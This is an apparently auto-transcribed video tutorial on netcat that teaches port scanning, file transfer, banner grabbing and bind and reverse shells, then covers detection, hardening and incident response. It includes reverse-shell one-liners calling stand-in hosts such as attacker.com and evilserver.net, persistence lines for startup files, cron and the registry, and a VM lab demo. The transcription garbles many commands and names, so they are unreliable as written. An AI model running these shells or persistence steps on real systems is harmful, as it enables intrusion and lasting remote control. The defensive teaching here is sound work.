It's a ethical hacking disclaimer. This video serves educational purpose only. It does not promote illegal activities. Viewers are responsible for any misuse of information related to ethical hacking, cybersecurity awareness. Hello guys, welcome back to Blackbird YouTube channel. I will teach you today with NC command we can port scanning, making it chat room and file transfer, grabbing banner and also reversal. What is this is hacking any laptop with one command. Okay, let's start. We are going to talk about something that sounds like magic, but it's real, it's dangerous, and it's hiding in plain sight. Hacker often brag with just one command icon on your computer, and surprisingly, they are not lying. The command is often "-nc", what is a netcat, but don't close your laptop yet, because today I will show you exactly how that one command works, how attackers make it run every time you switch on your machine, how to detect it like a forensic expert, and most importantly, how to lock down your system so tight that even a seasoned hacker would walk away. Let's begin, and we will first complete the theory and then we will complete the lab also, which is in practical. So what is netcat? Netcat, often called the Swiss Army knife of networking, it creates a simple tools to read and write data across network connection. Think of it like a walkie-talkie for computers. One person listens, the other speaks. But here's the twist. Net can also execute program on the remote side. That's where the trouble begins. A normal user might use it to file transfer or debug a server. A hacker, however, uses the "-e" or "-c" to flag, attach a file, a cell, a command prompt to the network connection. Suddenly, the harmless walkie-talkie becomes a remote control of your entire operating system. And scary part, on many older or misconfigured systems, Netcan comes pre-installed, or a hacker can drop a teeny compiled version under 100 KB and run it unnoticed. Let's begin the hacker's first step, reconnaissance. Before anyone attacks, they need to know which doors are open. Netcat's -z flag returns into a lightning fast port scanner. The command "nc-zv target IP 2280, check port 20 through 80. But here's what actually happened under the hood. Netcat attempt a TCP handshake on each port. If it gets a SYN ACK, the port is open. If it gets RST or timeout, the port is closed or filtered. The -v flag makes it talk back to you. But this is a noisy. A good intrusion detection system will see dozens of rapid connection attempts from one source and sound alarm. Hacker get around this by adding delayed with -w or scanning only a few parts at a time. You can also scan UDP with -u, -z, but UDP is stateless, so you will get false positive. Real world lesson: if you are a defender, scan your own external IP with "-zv", your public IP, and 1200 port. You will shocked how many forgotten services are listening. Close them. And if you see unexpected scan in your firewall logs, that's the entirely early indicator of a proving attacker. Now, a harmless but brilliant user, a live chat between two criminal or terminal. On machine A, you run "nc-l-p 4444", that creates listening socket on port 4444 like a phone ringing waiting for a call. On machine B, you run "nc machine IP machine A IP" and 4444 This is a listening port. As soon as the connection is made, anything typed on either side appear on others after pressing enter. It's half duplex, but it works. This is actually why early chat room worked before IRC. But here's the security twist: this chat is completely unencrypted. Anyone can see on same network with packet sniper like Wireshark can read any word, every word. Also, there is no authentication if you leave the listener running on the public network. Anyone who knows your IP and port can connect and send you message, or worse, try to inject command if your terminal interpret them. Use this in virtual lab to understand TCP stream. Try sending a file through the chat while typing catfile.txt and redirecting. You will see Netcat does not care about data types. It just moves bytes, and that raw power is why it's loved and feared. Imagine you need to send a 2 GB file to a friend, but FTP is blocked. Email would not allow attachment that large, and you don't have SSH setup. Netcat can do it in one line. On the receiving side, NC-L-P 4444 greater than received file.txt. On the sending side, NC receiver IP 4444 less than original file.txt. That's it. But here's the magic: you are essentially redirecting the file's content into the network socket. But progress bar, no encryption, no error correction. If network drops a packet, your file is corrupted. That's why real hacker use this only for small payload like reversal binary or a configuration file. Its advanced trick is combined with tar to transfer entire directory. On receiver, we have to type nc-l-p 4444 pipe tar xvf hyphen. On sender, tar cvf hyphen slash important folder pipe nc receiver ip 4444. That pipes a tar archive directly over Netcat. It's fast, lightweight, and leaves no logs on the file system. Defenders note is this: monitor outbound connection on unusual port. If you see a sudden spike in traffic from a process like NC or even WAS creating large outbound stream, that might be data exfiltration. Use NetHawks or IFTOP to catch it in real time. Banner grabbing is a art of identify exactly what software and version is running on a remote port. Hackers use this in to find vulnerable service. With Netcat, it's trivial. nc-v target.com and ATI. Then type get slash http slash 1.1 and press enter twice. The server replies the headers that often include server colon Apache slash 2.4.4112 or Microsoft IIS slash 10.0. That's gold for an attacker. They instantly know which exploit to try. You can do the same for SMTP port 25 by typing hello test or SSH port 20 through SSH usually don't reveal version until handshake. Some services are chatty. FTP send its banner immediately upon connection, no input needed. But here's the catcher: modern servers are often configured to hide banner or send fake ones. A security-conscious admin will change the server header to something generic like Apache. However, the other clauses remain. Order to headers, the way errors are formatted. Even the default 404 page, Netcat lets you see the raw unfiltered response before any browser or tool interpret it. Defense always change default banner use mode slash security or headers slash more module to strip revealing info and regularly check your own public service with netcat. See what an attacker would see. If you see a version number, you have got work to do. This is one you have been waiting for, the reverse shell. On the attacker machine, we have to write ANSI-LVP 4444 listen with verbose on port 4444. On the victim machine, we have to write ANSI attackers IP 4444 -E /win /bash if this is Linux, or if this is Windows, you have to write NC attacker IP 4444 -E cmd.exe. The "-e flag attaches a shell program to network socket. Suddenly, every command the attacker types run on the victim's machine. They can browse files, install malware, delete logs, even turns the webcam. Why is so devastating? Because connection is outbound from victim. Corporate firewall allow outbound traffic, so port 443 or 80 often works. Skilled hacker will obfuscate the command, maybe base64 encoded, or embedded it inside a PowerShell one-liner. For example, you can see on the screen that script could contain the netcat reversal. Detection is possible. Look for process name NC and cat or socket that have present parent process or cmd.exe or bash. Use Simon event id process creation on Windows. On Linux, audit can log every execute call. Also monitor network connection to unexpected external IPs on high port. Ethical warning: do not run -e on any system you do not own or have explicit write permission to test. In many countries, the alone is a computer misuse offense even without causing damage, used only in isolated VMs. Now, let me show you the command that makes hackers smile. On the attacker's machine, they type nc-l-p 4444. That means listening on the port 4444 for a incoming connection. On the victim's machine, that's your laptop. The hackers somehow trick you into running ncattacker.com 4444 e /win /bash. This is called reverse shell. Why reverse? Because normally server listen and a client connect. Yes, victim connect out to the attacker, and most firewall block incoming connection, but they allow outgoing ones like web browsing. So the hacker bypass your firewall entirely. Once connected, every keystroke the attacker types in executed on your machine. They can see your file, install malware, steal password, turn on your webcam. Anything you can do, they can do remotely, and victims see nothing. No pop-up, no warning, just a silent background process. That's the power of one command. There's another flavor, the wind shell. Here's the hacker's command on machine would be nc-l-p 5555-e /win/bash. The open port 5555 on your computer and attach a shell. The attacker then connect from their machine to your IP on the port. This is less common now because firewall block incoming ports, but internal network like an office, school, or home Wi-Fi without isolation, it's still deadly. Imagine a hacker on the same coffee stop Wi-Fi scanning on for open ports. They find open port 5555 connect and boom, you they are inside. No password needed. Wind cell are loud, but a neglected laptop they work perfectly. Making it run every boot. This is where it get truly scary. A one of command is dangerous. What hackers want permanent access. They want you to turn off your laptop, go to sleep. When you wake up and power on the back door, opens automatically. Here's how they do it on different systems. On the Linux or Mac OS, they add a line to slash dot bashrc or slash dot zshrc or slash etc slash rc.local file that runs commands at startup. Example nc d attacker.com 4444 e slash win slash bash ampersand. The hyphen D detaches it from any terminal, or they create a systemed service, a cron job at the rate reboot, or an init script. Even a simple at job can do it. On the window, they had used persistent netcat variant like nc.exe and add a registry key which you can see on the screen with value nc-d attacker 4444-d cmd.exe, or they use task scheduler startup folder or wmi event subscription. Some even hide it as a service name windows updater. The sneakiest trick: they don't use Netcat directly at all. They write a tiny script that downloads Netcat from dead drop URL, run it, then deletes the script. Every reboot it fetch a fresh copy. Detection almost impossible with basic tool. Persistence is the hacker's anchor. Remove it, they drift away. Let me paint you a picture. Sarah, a freelance graphic designer, downloads a free Photoshop crack from a torrent site. Inside a zip file is setup.exe, but it's actually a netcat payload wrapped in a icon. She runs it, nothing appears to happen, but in the background, the executable silently runs ncevilserver.net at 080-e cmd.exe. The hacker, let's call him Alex, has been listening to for hours. Suddenly, Alex's terminal lights up a connection. He types who am I? Sees Sarah's PC slash Sarah. He types "Dear, see her documents." He types "net user Sarah new pass." Change her password. Then he adds a registry key to return the netcat command every boot. Sarah finishes her work, shuts down, and sleeps. Next morning, she turns on her laptop. It works normally, but Alex reconnects instantly. He steals her client contract, upload ransomware, and demand Bitcoin. All from a single NC command. This is not a movie. This happens every day. Now, enough horror story. Let's become the heroes. How do you detect this? You don't need expensive tool, just curiosity and a few commands. Number 1, check listening ports netstat-tulpn on the Linux or netstat-an pipe find listen in window. Look for strange port 4444, 5555, 1337 or anything not running in a non-service. If you see NC or NCAT in process list, terminate it immediately. Number 2, scan for outgoing connection double hyphen double s hyphen 2 TUNAP on the Linux so active connection. If your laptop is connecting to an IP in another country at 3 a.m., that's suspicious. Use LSOF-I to see which program owns the connection. Check auto start location on window, open msconfig, then go startup or use auto runs from Microsoft Sin internals. Look for entry with nc.exe or netstat or weird name like svchost.exe in user folder. On the Linux, check crontab-l or systemctl list timers or /config /autostart/ and /etc/rc.local. Number 4. Monitor file integrity. Use tripwire or AIDE or even find slash hyphen name nc hyphen type f2 greater than slash dev slash null. Netcat should not be a normal laptop unless you install it internationally. Number 5. Network monitoring. Install Wireshark or TCP dump. Look for TCP stream with plaintest commands like ls-dir whoami. That's dead giveaway of a reversal. Endpoint detection EDR. Modern tools like Simon Window, which is in Window, logs every process creation. Search for nc.exe or netcat. Swanning cmd.exe or bash. That's a red flag. Pro tips is this: regularly scan, regularly run netstat-ano and cross-check PID with Task Manager. If a PID show NC but you don't remember installing it, kill it and investigate it. Then how to save your laptop? Number 1. Prevention is better than detection. Here's your digital immune system. Number 1. Firewall rules. Block all incoming connection by default. Allow only what you need. On the window, Defender Firewall. Create a outbound rule blocking ports 1 to 1024 for unknown apps. Better yet, use a whitelist. Only your browser, email, and updates can go out. Number 2, remove or restrict Netcat. If you don't need Netcat, uninstall it on Linux. apt remove netcat hyphen openbst and ncat. On macOS, remove any homebrew netcat. On Windows, scan for nc.exe and delete it. But remember, a hacker can upload their own copy, so also. Number 3. Application control. Use AppLocker in Windows or Vaporlicid in Linux to allow only signed executables in system folder. Block execution from temp downloads and user writable directories. Number 4. Least privilege. Never run a root as or administrator daily. Create a standard user account. A reverse shell running as a limited user cannot install persistent system wide. That's huge. Number 5. Keep software update. Many netcat attacks arrive by phishing or drives by downloads. Patched browser, PDF readers, and OS regularly. Number 6. Disable unnecessary service. If you don't use Telnet, RSH, or legacy file sharing, turn them off. Less attack surface. Number 7. Use a HIDS host, host intrusion detection system like OSSEC or Wazoo can alert you the moment ANSI is executed. The education is you are the last line of defense. Don't run random executables. Don't paste command from strangers into your terminal. That's how Netcat gets in. Let's say You suspect someone has already planted a netcat backdoor. Don't panic. Here's your three-step plan. Step number one, disconnect. Immediately unplug the Ethernet or turn off your Wi Fi. Break the attacker's session. They might have a persistent connection, so cutting the network stops live commands. Step 2, preserve evidence. Don't reboot, that could wipe memory resident clues. Instead, capture RAM using dumpit or FTK imager. Copy logs from /var /log /auth.log, window event viewer, security log, and netstat snapshots. This help if you want to report to authorities. Number 3. Step 3. Clean and restore. Boot from a trusted USB Live OS like Tails or Ubuntu Live. Scan your hard drive offline. Remove suspicious backups or startups entries. Better yet, nuke it, wipe the drive, and reinstall from non-clean backup. Yes, it's extreme, but it's the only way to be 100% sure no rootkit or hidden persistent remain. After match, change all password from a clean device, enable 2FA, monitor credit report if financial data was exposed, and learn from it what was entry point, torrent, phishing mail. Fix that hole. Here's my challenge to you. That's best way to defend against Netcat is to use legally in this lab. Set up a two virtual machine. VirtualBox is free. Install Kali Linux as a attacker and Ubuntu or Windows VMs as a victim. Snapshot them, then practice. Create a reversal from victims to attacker. Then and add persistence by cron or registry. Then switch heads on victims, run netstat and ps to find it. Then kill the process, remove the persistent, block the part. Do this 5 times. You'll never be scared of netcat again. You will respect it, and the respect becomes cybersecurity wisdom. But remember, never run these commands on someone else's computer without written permission. That's felony. Use your power ethically. To sum up, Netcat is simply a tool. Like a knife, it's a chef's hand. It prepares food. In an attacker's hand, it's a weapon. The burn command nc-e/win/bash is dangerous only if your system allows unauthorized execution and outbound connection. While layering firewall, principle of least privilege, startup monitoring, and user education, you make that command useless. Hackers rely on lazy default and informed users. Don't be that user. Be the one who check netstat every morning. Be the one who thinks twice before pasting a command. And cybersecurity is not about perfection, it's about making attacks too noisy, too difficult, or too temporary to succeed. I'll leave you with a source. Read the Man Ansi page. It's surprisingly educational. Practice on Hack the Box Netcat Challenge. Watch Blue Team's Labs online for detection simulation. And remember, every hacker was once a learner who chose the wrong path. You can choose the right one. Thank you. Now let's open the floor for question. Ask me anything about Netcat, persistent, or how to secure your grandma's laptop. No question is too basic. We will start somewhere. We all start somewhere. Okay, let's start. We are doing practical of Netcat command. First of all, we will make a messenger. So this is attacker machine and this is victim machine. So we have to open terminal in attacker machine and run the first of all we have to see what is its IP. If config, and we know that's where is IP. This is IP, and we have to first run nc-lvp to listening command, and running I want to listen on 4444 port, so run it. And in the victim machine we have to type nc-v and attacker machine IP and port where attacker is listening. This is open, and this is attacker machine. If I want to write hi, I am attacker, so you can see here written is hi, I am attacker, and client want to victim want to send message hi, I I am victim. So here we can see that both of message. So first, this is simple messenger for hackers, and so we had covered this. Now we will start making a getting a shell with another example with netcat. So I am exited. I want to close it. So I had closed it, and I want to close. Here is close all. Now if I want to send any file to attacker, so victim want to send any file to attacker, so attacker have to type nc-l-v and port 44 and this, and txt file name what is written, what want to save. Okay, this is listening on port 444, and we have to type, we have to send which v.txt. Okay, then we have to write nc hyphen, this is attacker IP, and this is port where attacker is listening. Then here is we have to make this symbol and file name what we want to send, and enter. Here you can see that connection received, and I think file is coming. This is what.txt, cat what.txt. You can see this is data, and you can see same data in cat v.txt. This is, So second method is this, which is file sharing. So we last method, we have to make generating a cell and taking a reverse connection of full. This is the one that you have been waiting for, reverse cell. Reverse cell. We have, this is attacker machine. We have to open NC-LVP and port 444 to listening on. This is attacker machine. I want this has listening on 4444 port. Then we have to write in victim machine and see this is IP 4444H port and hyphen E slash win slash was. Okay, and then enter, and boom, we have connected to. Attacker has access to everything. We have every directory which in victim attacker can access. You can see that. I will, here is test, here is reports. Okay, resume.pdf, param payload accesses.txt, payload.txt. Okay, we will open the payload dot txt. This is the data, this is the data in here, and you can see the same on victim machine also. Here will, victim cannot retrieve anything of attacker, but attacker can read anything, edit anything. He had full access of the victim machines, so attacker can do anything. And with cron job, attacker can set it whenever the victim's machine reboot it. It's which payload, like this payload run every time and attacker can access every time. So let's meet with new video of hacking. And so let's, thank you for like and subscribe so I can make more videos. And